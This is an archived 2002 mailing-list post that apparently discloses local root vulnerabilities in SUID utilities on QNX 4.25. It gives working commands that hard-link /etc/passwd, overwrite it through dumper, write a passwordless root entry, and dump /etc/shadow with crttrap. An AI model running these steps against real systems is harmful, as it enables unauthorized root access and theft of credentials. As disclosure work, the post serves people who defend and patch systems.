Neohapsis is currently accepting applications for employment. For more information, please visit our website www.neohapsis.com or email firstname.lastname@example.org
From: Simon Ouellette (einherjhotmail.com)
Date: Fri May 31 2002 - 16:42:17 CDT
I think I found what appears to be several (or one fundamental)
vulnerabilities under QNX(tested on version 4.25). I have not found any
documentation/reference to these anywhere, so I assume they/it were not
Importance of the bug: any local user can gain root access(which, under QNX,
means root access to the entire network, of course)
Nature: some(or "most" ? or "all" ?) SUID programs that output data to files
actually do not look for permissions before overwriting identical(already
existent) filenames. Also, they follow hard links(I did not verify how they
react to symbolic links). In fact, not only do they overwrite the files, but
they give the user ownership of the file. So programs like /bin/dumper,
monitor, the Watcom "sample" utility, can be used to overwrite and gain
ownership of read-only, root-owned files such as /etc/passwd. From there,
it's easy to figure out how to gain root access...
Example exploit, with /bin/dumper:
Let EVIL be the unprivileged user who wants to gain root access.
#link to the passwd file: dumper dumps to [process name].dmp
$ ln /etc/passwd /home/EVIL/ksh.dmp
#call the program that will attempt to write to the hard link
$ dumper -d /home/EVIL -p [PID of EVIL's ksh]
#have dumper do its job by terminating the monitored process
#at this point, /etc/passwd is overwritten by the binary dump, and more
importantly: EVIL is now the owner !
$ echo root::0:0::///:/bin/sh > /etc/passwd
#but now no login works because /etc/passwd is not owned by userid 0. #So
#and change your password. This gives /etc/passwd ownership back to root,
keeping the modifications you have made.
"monitor" is even easier to exploit, for example, because you can directly
specify the filename with the parameter -f /etc/passwd. No need for a link.
Another similar vulnerability was with crttrap. This utility has one
interesting parameter/option that allows you to dump the contents of the
configuration file.... and it is SUID. So all you have to do is:
$ crttrap -c /etc/shadow
...and it will dump the shadow file for you(even if you normally do not have
read access to it, such as with an unprivileged user).
So this can either be seen as multiple vulnerabilities in different
programs, or as a single fundamental flaw in the ownership/permissions
checking of the filesystem. I could not tell at what level exactly is the
Could some of you reproduce the exploit and confirm that it works ? I would
like to make sure that it is not specific to, maybe, some configuration flaw
in the systems I used to test it. Also, if you could check with the most
recent QNX versions to see if this is still applicable...
P.S.: I also noticed that Watcom sample and int10, but not monitor, will
segfault when they are given long filenames as a parameter... Maybe this can
turn into a buffer overflow, but I did not have the time to check.
Join the world’s largest e-mail service with MSN Hotmail.